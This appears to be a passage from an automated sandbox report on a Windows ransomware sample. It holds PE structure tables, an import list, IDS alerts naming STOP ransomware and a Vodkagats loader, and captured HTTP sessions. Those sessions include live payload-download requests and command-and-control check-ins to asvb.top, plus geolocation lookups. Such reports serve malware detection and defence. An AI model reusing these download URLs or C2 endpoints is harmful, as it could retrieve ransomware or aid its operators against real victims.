                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x270b0          0x40          .rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_IAT             0x20000          0x24c         .rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                              Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy            Characteristics
                              .text   0x1000           0x1e9a0       0x1ea00   22d4b0b487c313f693b1f72a964f695c  False     0.4570232780612245   data       6.262580943386606  IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata  0x20000          0x8770        0x8800    b8644a31f522fc0f08b9260ec6d66da5  False     0.2925379136029412   data       4.822598839841113  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data   0x29000          0xa4ee8       0x96000   68f58e5ef5e899b63dd2247283a8cac9  False     0.96875              data       7.931848158465569  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc   0xce000          0xae78        0xb000    c1338247566b23c28f40def10b9eff0b  False     0.5241033380681818   data       5.620829032954194  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              Name                              RVA      Size    Type                                                               Language  Country        ZLIB Complexity
                              CIPINANIVEGOWENA                  0xd6b68  0x470   ASCII text, with very long lines (1136), with no line terminators  Tatar     Russia         0.6197183098591549
                              JORUZAZOHEBAJEXEYECOYEMUFOVIWIPU  0xd4e48  0x6c5   ASCII text, with very long lines (1733), with no line terminators  Tatar     Russia         0.6099249855741489
                              MEMOH                             0xd5510  0x127b  ASCII text, with very long lines (4731), with no line terminators  Tatar     Russia         0.5928979074191503
                              WETEBIPEREXIBUBUVEWOSEMA          0xd6790  0x3d8   ASCII text, with very long lines (984), with no line terminators   Tatar     Russia         0.6321138211382114
                              RT_CURSOR                         0xd7030  0x134   Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"             Tatar     Russia         0.75
                              RT_CURSOR                         0xd7180  0x130   Device independent bitmap graphic, 32 x 64 x 1, image size 0       Tatar     Russia         0.42105263157894735
                              RT_CURSOR                         0xd72b0  0xf0    Device independent bitmap graphic, 24 x 48 x 1, image size 0       Tatar     Russia         0.4375
                              RT_CURSOR                         0xd73a0  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0      Tatar     Russia         0.0898217636022514
                              RT_ICON                           0xce610  0xea8   Device independent bitmap graphic, 48 x 96 x 8, image size 0       English   United States  0.4211087420042644
                              RT_ICON                           0xcf4b8  0x8a8   Device independent bitmap graphic, 32 x 64 x 8, image size 0       English   United States  0.5970216606498195
                              RT_ICON                           0xcfd60  0x6c8   Device independent bitmap graphic, 24 x 48 x 8, image size 0       English   United States  0.6762672811059908
                              RT_ICON                           0xd0428  0x568   Device independent bitmap graphic, 16 x 32 x 8, image size 0       English   United States  0.7442196531791907
                              RT_ICON                           0xd0990  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 0      English   United States  0.516286307053942
                              RT_ICON                           0xd2f38  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0      English   United States  0.6641651031894934
                              RT_ICON                           0xd3fe0  0x988   Device independent bitmap graphic, 24 x 48 x 32, image size 0      English   United States  0.6987704918032787
                              RT_ICON                           0xd4968  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 0      English   United States  0.8129432624113475
                              RT_STRING                         0xd85c0  0x310   Matlab v4 mat-file (little endian) u, numeric, rows 0, columns 0   Tatar     Russia         0.4719387755102041
                              RT_STRING                         0xd88d0  0x5a4   data                                                               Tatar     Russia         0.4376731301939058
                              RT_ACCELERATOR                    0xd6fd8  0x58    data                                                               Tatar     Russia         0.7954545454545454
                              RT_GROUP_CURSOR                   0xd7168  0x14    Lotus unknown worksheet or configuration, revision 0x1             Tatar     Russia         1.3
                              RT_GROUP_CURSOR                   0xd8448  0x30    data                                                               Tatar     Russia         1.0
                              RT_GROUP_ICON                     0xd4dd0  0x76    data                                                               English   United States  0.6610169491525424
                              RT_VERSION                        0xd8478  0x144   data                                                               Tatar     Russia         0.5987654320987654
DLL | Import
KERNEL32.dll | GetSystemDefaultLangID, ExitProcess, GetCommandLineW, GetPrivateProfileSectionNamesW, GlobalFix, SearchPathW, OpenFile, lstrlenA, WritePrivateProfileStructA, CopyFileExW, GetDriveTypeW, DebugActiveProcessStop, SetEndOfFile, BuildCommDCBAndTimeoutsA, LoadResource, SystemTimeToTzSpecificLocalTime, DeleteVolumeMountPointA, ScrollConsoleScreenBufferW, SetConsoleActiveScreenBuffer, SetHandleInformation, GetProfileStringW, GetProfileSectionA, GetUserDefaultLCID, SetComputerNameW, AddConsoleAliasW, FlushConsoleInputBuffer, GetProcessPriorityBoost, IsBadReadPtr, EnumTimeFormatsW, TlsSetValue, GlobalAlloc, GetPrivateProfileIntA, GetVolumeInformationA, LoadLibraryW, GetConsoleMode, GetSystemPowerStatus, GlobalFlags, HeapCreate, GetFileAttributesW, GetBinaryTypeA, GetTimeZoneInformation, GetConsoleFontSize, GetOverlappedResult, DisconnectNamedPipe, RaiseException, DeactivateActCtx, CreateJobObjectA, GetConsoleOutputCP, VerifyVersionInfoW, FreeLibraryAndExitThread, OpenMutexW, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, CreateNamedPipeA, SetVolumeLabelW, LocalLock, MoveFileW, CopyFileA, GetConsoleDisplayMode, EnterCriticalSection, GetTempFileNameA, GetLocalTime, OpenThread, WriteConsoleA, OpenWaitableTimerW, SetFileApisToANSI, SetCommMask, GetTapeParameters, WaitForMultipleObjects, SetSystemTime, SetEnvironmentVariableA, GlobalWire, GetOEMCP, WriteProfileStringA, GetModuleHandleA, RequestWakeupLatency, GetConsoleCursorInfo, OpenSemaphoreW, GetVersionExA, lstrcpyA, WideCharToMultiByte, MoveFileA, GetStartupInfoW, HeapValidate, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleFileNameW, InterlockedIncrement, InterlockedDecrement, GetACP, GetCPInfo, IsValidCodePage, TlsGetValue, GetModuleHandleW, TlsAlloc, GetCurrentThreadId, TlsFree, LeaveCriticalSection, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, Sleep, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, HeapDestroy, HeapFree, VirtualFree, GetModuleFileNameA, WriteFile, HeapAlloc, HeapSize, HeapReAlloc, DebugBreak, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, RtlUnwind, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, InitializeCriticalSectionAndSpinCount, LoadLibraryA, FlushFileBuffers, ReadFile, SetStdHandle, CloseHandle, CreateFileA
USER32.dll | GetWindowInfo
Language of compilation system | Country where language is spoken | Map
Tatar | Russia
English | United States
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-26T23:32:41.298785+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 52648 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:32:41.298785+0200 | TCP | 2018581 | ET MALWARE Single char EXE direct download likely trojan (multiple families) | 1 | 52648 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:32:41.298785+0200 | TCP | 2020826 | ET MALWARE Potential Dridex.Maldoc Minimal Executable Request | 1 | 52648 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:32:41.298785+0200 | TCP | 2036333 | ET MALWARE Win32/Vodkagats Loader Requesting Payload | 1 | 52648 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:32:03.640222+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 52640 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:31:17.409857+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 49716 | 443 | 192.168.2.6 | 188.114.97.3
2024-08-26T23:32:58.064861+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 52651 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:32:58.064861+0200 | TCP | 2833438 | ETPRO MALWARE STOP Ransomware CnC Activity | 1 | 52651 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:31:15.144397+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 49712 | 443 | 192.168.2.6 | 188.114.97.3
2024-08-26T23:32:56.445703+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 52650 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:32:56.445703+0200 | TCP | 2036334 | ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key | 1 | 52650 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:31:37.065347+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 49714 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:33:02.658754+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 52652 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:33:02.658754+0200 | TCP | 2018581 | ET MALWARE Single char EXE direct download likely trojan (multiple families) | 1 | 52652 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:33:02.658754+0200 | TCP | 2020826 | ET MALWARE Potential Dridex.Maldoc Minimal Executable Request | 1 | 52652 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:33:02.658754+0200 | TCP | 2036333 | ET MALWARE Win32/Vodkagats Loader Requesting Payload | 1 | 52652 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:31:38.858740+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 49717 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:31:38.858740+0200 | TCP | 2833438 | ETPRO MALWARE STOP Ransomware CnC Activity | 1 | 49717 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:31:34.643947+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 52638 | 443 | 192.168.2.6 | 188.114.97.3
2024-08-26T23:32:30.047078+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 52645 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:31:58.536295+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 52639 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:31:58.536295+0200 | TCP | 2020826 | ET MALWARE Potential Dridex.Maldoc Minimal Executable Request | 1 | 52639 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:31:58.536295+0200 | TCP | 2036333 | ET MALWARE Win32/Vodkagats Loader Requesting Payload | 1 | 52639 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:32:05.302518+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 52641 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:32:05.302518+0200 | TCP | 2833438 | ETPRO MALWARE STOP Ransomware CnC Activity | 1 | 52641 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:30:59.584547+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 52654 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:30:59.584547+0200 | TCP | 2018581 | ET MALWARE Single char EXE direct download likely trojan (multiple families) | 1 | 52654 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:30:59.584547+0200 | TCP | 2020826 | ET MALWARE Potential Dridex.Maldoc Minimal Executable Request | 1 | 52654 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:30:59.584547+0200 | TCP | 2036333 | ET MALWARE Win32/Vodkagats Loader Requesting Payload | 1 | 52654 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:31:27.641342+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 52636 | 443 | 192.168.2.6 | 188.114.97.3
2024-08-26T23:32:31.658617+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 52646 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:32:31.658617+0200 | TCP | 2833438 | ETPRO MALWARE STOP Ransomware CnC Activity | 1 | 52646 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:32:19.926942+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 52643 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:32:19.926942+0200 | TCP | 2020826 | ET MALWARE Potential Dridex.Maldoc Minimal Executable Request | 1 | 52643 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:32:19.926942+0200 | TCP | 2036333 | ET MALWARE Win32/Vodkagats Loader Requesting Payload | 1 | 52643 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:31:09.086681+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 49711 | 443 | 192.168.2.6 | 188.114.97.3
2024-08-26T23:31:37.061694+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 49713 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:31:37.061694+0200 | TCP | 2020826 | ET MALWARE Potential Dridex.Maldoc Minimal Executable Request | 1 | 49713 | 80 | 192.168.2.6 | 92.246.89.93
2024-08-26T23:31:37.061694+0200 | TCP | 2036333 | ET MALWARE Win32/Vodkagats Loader Requesting Payload | 1 | 49713 | 80 | 192.168.2.6 | 92.246.89.93
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Aug 26, 2024 23:31:07.930958033 CEST | 63210 | 53 | 192.168.2.6 | 1.1.1.1
                              Aug 26, 2024 23:31:08.166330099 CEST | 53 | 63210 | 1.1.1.1 | 192.168.2.6
                              Aug 26, 2024 23:31:15.217793941 CEST | 54369 | 53 | 192.168.2.6 | 1.1.1.1
                              Aug 26, 2024 23:31:15.629057884 CEST | 53 | 54369 | 1.1.1.1 | 192.168.2.6
                              Aug 26, 2024 23:31:22.561281919 CEST | 53 | 49218 | 1.1.1.1 | 192.168.2.6

                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                              Aug 26, 2024 23:31:07.930958033 CEST | 192.168.2.6 | 1.1.1.1 | 0xf5c1 | Standard query (0) | api.2ip.ua | A (IP address) | IN (0x0001) | false
                              Aug 26, 2024 23:31:15.217793941 CEST | 192.168.2.6 | 1.1.1.1 | 0x222b | Standard query (0) | asvb.top | A (IP address) | IN (0x0001) | false

                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                              Aug 26, 2024 23:31:08.166330099 CEST | 1.1.1.1 | 192.168.2.6 | 0xf5c1 | No error (0) | api.2ip.ua | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                              Aug 26, 2024 23:31:08.166330099 CEST | 1.1.1.1 | 192.168.2.6 | 0xf5c1 | No error (0) | api.2ip.ua | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                              Aug 26, 2024 23:31:15.629057884 CEST | 1.1.1.1 | 192.168.2.6 | 0x222b | No error (0) | asvb.top | | 92.246.89.93 | A (IP address) | IN (0x0001) | false
                              • api.2ip.ua
                              • asvb.top
                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              0 | 192.168.2.6 | 49713 | 92.246.89.93 | 80 | 416 | C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 26, 2024 23:31:15.683552027 CEST | 103 | OUT | GET /files/penelop/updatewin1.exe HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              1 | 192.168.2.6 | 49714 | 92.246.89.93 | 80 | 416 | C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 26, 2024 23:31:15.684024096 CEST | 143 | OUT | GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              2 | 192.168.2.6 | 49717 | 92.246.89.93 | 80 | 6408 | C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 26, 2024 23:31:17.481084108 CEST | 132 | OUT | GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              3 | 192.168.2.6 | 52639 | 92.246.89.93 | 80 | 416 | C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 26, 2024 23:31:37.137922049 CEST | 103 | OUT | GET /files/penelop/updatewin2.exe HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              4 | 192.168.2.6 | 52640 | 92.246.89.93 | 80 | 416 | C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 26, 2024 23:31:42.262290001 CEST | 143 | OUT | GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              5 | 192.168.2.6 | 52641 | 92.246.89.93 | 80 | 6408 | C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 26, 2024 23:31:43.923597097 CEST | 132 | OUT | GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              6 | 192.168.2.6 | 52643 | 92.246.89.93 | 80 | 416 | C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 26, 2024 23:31:58.544892073 CEST | 102 | OUT | GET /files/penelop/updatewin.exe HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              7 | 192.168.2.6 | 52645 | 92.246.89.93 | 80 | 416 | C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 26, 2024 23:32:08.700051069 CEST | 143 | OUT | GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              8 | 192.168.2.6 | 52646 | 92.246.89.93 | 80 | 6408 | C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 26, 2024 23:32:10.294142962 CEST | 132 | OUT | GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              9 | 192.168.2.6 | 52648 | 92.246.89.93 | 80 | 416 | C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 26, 2024 23:32:19.934225082 CEST | 94 | OUT | GET /files/penelop/3.exe HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              10 | 192.168.2.6 | 52650 | 92.246.89.93 | 80 | 416 | C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 26, 2024 23:32:35.090600967 CEST | 143 | OUT | GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=true HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              11 | 192.168.2.6 | 52651 | 92.246.89.93 | 80 | 6408 | C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 26, 2024 23:32:36.704564095 CEST | 132 | OUT | GET /nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              12 | 192.168.2.6 | 52652 | 92.246.89.93 | 80 | 416 | C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 26, 2024 23:32:41.305819988 CEST | 94 | OUT | GET /files/penelop/4.exe HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              13 | 192.168.2.6 | 52654 | 92.246.89.93 | 80 | 416 | C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Aug 26, 2024 23:33:02.667124033 CEST | 94 | OUT | GET /files/penelop/5.exe HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: asvb.top


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              0 | 192.168.2.6 | 49711 | 188.114.97.3 | 443 | 972 | C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-08-26 21:31:08 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: api.2ip.ua
                              2024-08-26 21:31:09 UTC | 891 | IN | HTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 21:31:09 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              strict-transport-security: max-age=63072000; preload
                              x-frame-options: SAMEORIGIN
                              x-content-type-options: nosniff
                              x-xss-protection: 1; mode=block; report=...
                              access-control-allow-origin: *
                              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0xi451NrdE4jWxBV7uftuM4tNTmGfWjb%2FyDiROLCLd3o3FaYcsg98ET3I7FFr%2BkVaOx8ymSibh3GxG%2B0oy91Jw2kaew2a5WQvbcpoqwU46F67i8k%2FcGSyB5rtxLv"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b96ed53ea757d13-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-08-26 21:31:09 UTC | 418 | IN | Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                              2024-08-26 21:31:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              1 | 192.168.2.6 | 49712 | 188.114.97.3 | 443 | 416 | C:\Users\user\Desktop\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-08-26 21:31:14 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: api.2ip.ua
                              2024-08-26 21:31:15 UTC | 893 | IN | HTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 21:31:15 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              strict-transport-security: max-age=63072000; preload
                              x-frame-options: SAMEORIGIN
                              x-content-type-options: nosniff
                              x-xss-protection: 1; mode=block; report=...
                              access-control-allow-origin: *
                              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OVNpJCkXM%2BUo8hCcuxejGyzB9KBYUK%2FqkpE7aOTxQCAH%2FthRJTGncBtLKuDoWbWxIZ3gbJPkGTsOSh4BmmQ4eSLJTIo%2BcndSHu023Ri74u06Z5EBoF9CEMpw6GF%2F"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b96ed79ce485e7a-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-08-26 21:31:15 UTC | 418 | IN | Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                              2024-08-26 21:31:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              2 | 192.168.2.6 | 49716 | 188.114.97.3 | 443 | 6408 | C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-08-26 21:31:17 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: api.2ip.ua
                              2024-08-26 21:31:17 UTC | 889 | IN | HTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 21:31:17 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              strict-transport-security: max-age=63072000; preload
                              x-frame-options: SAMEORIGIN
                              x-content-type-options: nosniff
                              x-xss-protection: 1; mode=block; report=...
                              access-control-allow-origin: *
                              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                              access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m9UtSW4g2SmYaS7Huf0CWSQbkH7Qk93js6etjw%2FceML6%2BqsXy3b7K2aoIUs2cF%2BJjos80NvU0cYtf84juVz3gBRZdgNdbv4aiaB6W42EJR3l1HPSL7yjwwLrHHsw"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b96ed87ff2141a9-EWR
                              alt-svc: h3=":443"; ma=86400
                              2024-08-26 21:31:17 UTC | 418 | IN | Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
                              2024-08-26 21:31:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              3 | 192.168.2.6 | 52636 | 188.114.97.3 | 443 | 6292 | C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-08-26 21:31:27 UTC | 85 | OUT | GET /geo.json HTTP/1.1
                              User-Agent: Microsoft Internet Explorer
                              Host: api.2ip.ua
                              2024-08-26 21:31:27 UTC | 893 | IN | HTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 21:31:27 GMT
                              Content-Type: application/json
                              Transfer-Encoding: chunked
                              Connection: close
                              strict-transport-security: max-age=63072000; preload
                              x-frame-options: SAMEORIGIN
                              x-content-type-options: nosniff
                              x-xss-protection: 1; mode=block; report=...
                              access-control-allow-origin: *
                              access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
